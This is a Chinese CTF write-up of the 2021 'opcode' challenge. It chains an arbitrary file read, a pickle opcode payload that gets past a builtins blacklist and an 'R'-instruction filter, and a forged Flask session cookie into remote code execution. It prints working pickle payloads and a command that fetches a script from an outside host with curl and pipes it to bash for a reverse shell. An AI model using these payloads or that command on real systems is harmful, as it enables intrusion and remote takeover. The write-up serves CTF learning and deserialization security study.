巅峰极客2021 opcode

opcode

睡到下午快3点,起来洗漱点外卖,然后看了下比赛,除了JS题还发现这道opcode

img

pickle? opcode? 第一反应就是去年抗疫赛那道题目,那也是唯一一次接触opcode的pickle反序列化题目。

以下是参考文章:

https://xz.aliyun.com/t/7436

https://zhuanlan.zhihu.com/p/89132768

https://www.sohu.com/a/458581292_120967809

https://www.anquanke.com/post/id/188981

https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html

一上来就是个任意文件读取(这些题怎么都喜欢这套路)

先读/proc/self/environ 读到/var/www/html目录和python版本为3.8.0 ,再读app.py

image-20210731221701029

app.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


app = Flask(__name__)

app.config['SECRET_KEY'] = "y0u-wi11_neuer_kn0vv-!@#se%32"

@app.route('/admin', methods = ["POST","GET"])
def admin():
    if('{}'.format(session['username'])!= 'admin' and str(session['username'] , encoding = "utf-8")!= 'admin'):
        return "not admin"
    try:
        data = base64.b64decode(session['data'])
        if "R" in data.decode():
            return "nonono"
        pickle.loads(data)
    except Exception as e:
        print(e)
    return "success"

@app.route('/login', methods = ["GET","POST"])
def login():
    username = request.form.get('username')
    password = request.form.get('password')
    imagePath = request.form.get('imagePath')
    session['username'] = username + password
    session['data'] = base64.b64encode(pickle.dumps('hello' + username, protocol=0))
    try:
        f = open(imagePath,'rb').read()
    except Exception as e:
        f = open('static/image/error.png','rb').read()
    imageBase64 = base64.b64encode(f)
    return render_template("login.html", username = username, password = password, data = bytes.decode(imageBase64))

@app.route('/', methods = ["GET","POST"])
def index():
    return render_template("index.html")
if __name__ == '__main__':
    app.run(host='0.0.0.0', port='8888')

限制了module为builtins并且存在黑名单

image-20210731221811919

也同样不让用R指令

image-20210731221825493

构造opcode

模块限定和黑名单的问题可以参考Code-Breaking的Picklecode

image-20210731222043736

ban掉了R指令,我们还能用i指令和o指令。

这里用到辅助工具 Pker 来构造opcode

文中给出了3种函数执行指令的用法

image-20210731222213875

由于前半部分的builtins限制和黑名单和Code-Breaking里一样,所以就直接在这个的Pker代码基础上进行改造

1
2
3
4
5
6
7
8
getattr=GLOBAL('builtins','getattr')
dict=GLOBAL('builtins','dict')
dict_get=getattr(dict,'get')
glo_dic=GLOBAL('builtins','globals')()
builtins=dict_get(glo_dic,'builtins')
eval=getattr(builtins,'eval')
eval('print("123")')
return

可以很明显的看出这是R指令,xxx(sss)形式的函数调用,要把他改成i或者o指令形式

我这里是用的o指令

1
2
3
dict_get=getattr(dict,'get')  
<==>
OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get')
1
2
3
builtins=dict_get(glo_dic,'builtins') 
<==>
OBJ(OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get'),GLOBAL('builtins','globals')(),'builtins')
1
2
3
4
eval 
<==> 
getattr(builtins,'eval') 
<==> OBJ(GLOBAL('builtins','getattr'),OBJ(OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get'),GLOBAL('builtins','globals')(),'builtins'),'eval')

所以最终

1
2
eval('print("123")')
<==>  OBJ(OBJ(GLOBAL('builtins','getattr'),OBJ(OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get'),GLOBAL('builtins','globals')(),'builtins'),'eval'),'print("123")')

但是发现还有一个R指令

image-20210731222811866

又重新构造了一遍,确定已经没有R指令形式的函数的调用了,为什么还会这样呢?

看这个opcode出现R的位置,是在builtins globals处

原来是 GLOBAL(‘builtins’,’globals’)() 这里带一个(),opcode给他计算成了R指令调用()

能不能用 OBJ(GLOBAL('builtins','globals'),'')代替呢?

咦?报错,提示说不接受参数

那干脆把‘’也去掉

OBJ(GLOBAL('builtins','globals'))

所以最终构造的可执行的pker代码:

1
2
OBJ(OBJ(GLOBAL('builtins','getattr'),OBJ(OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get'),OBJ(GLOBAL('builtins','globals')),'builtins'),'eval'),'print("123")')
return

image-20210731222950790

image-20210731223001774

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()



st=b"""((cbuiltins\ngetattr\n((cbuiltins\ngetattr\ncbuiltins\ndict\nS\'get\'\no(cbuiltins\nglobals\noS\'builtins\'\noS\'eval\'\noS\'print("Teabo")\'\no."""
print(st)
if b"R" in st:
    print("nonono")

print(base64.b64encode(st))
pickle.loads(st)

Flask_session伪造

image-20210731223048426

image-20210731223116294

感觉好矛盾啊?username要为admin,但是data又是’hello’+username。

正当冥思苦想是不是有什么trick可以绕过这个判断和满足条件时,我看到Burp上的返回包的session时突然灵光一闪,这分明就是flask_session,再加上给出了secret_key(之前居然把它忽略了),不就是flask_session伪造吗?重新伪造一个session值,就能又满足username是admin,data是opcode了

image-20210731223833859

image-20210731223842008

晕了,自己构造的session放在admin路由上一直是500,卡了快一个小时

应该是我用的flask解密脚本不对

又找了个脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption("eyJkYXRhIjp7IiBiIjoiVm0xb2JHSkhlSFpaVjFKMFlWYzBTMk5FUVV0TVp6MDkifSwidXNlcm5hbWUiOiJhZG1pbiJ9.YQVRoA.BIxYGaDr9KWdxF2FVOkU_4Rq7I0".encode()))

image-20210731224451660

用这个格式再去用secret_key加密

image-20210731224523027

终于返回success了!

image-20210731231033668

由于只有return 没有回显,所以考虑反弹shell

直接利用eval(__import__("os").popen("curl 120.26.172.130/rev|bash").read())

opcode:

1
2
OBJ(OBJ(GLOBAL('builtins','getattr'),OBJ(OBJ(GLOBAL('builtins','getattr'),GLOBAL('builtins','dict'),'get'),OBJ(GLOBAL('builtins','globals')),'builtins'),'eval'),'__import__("os").popen("whoami").read()')
return

本地测试一下

image-20210731224705549

VPS可以收到请求

image-20210731224715152

返回题目,直接替换session,重新发包

image-20210731224822081

/app目录下找到flag

image-20210731224833918

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗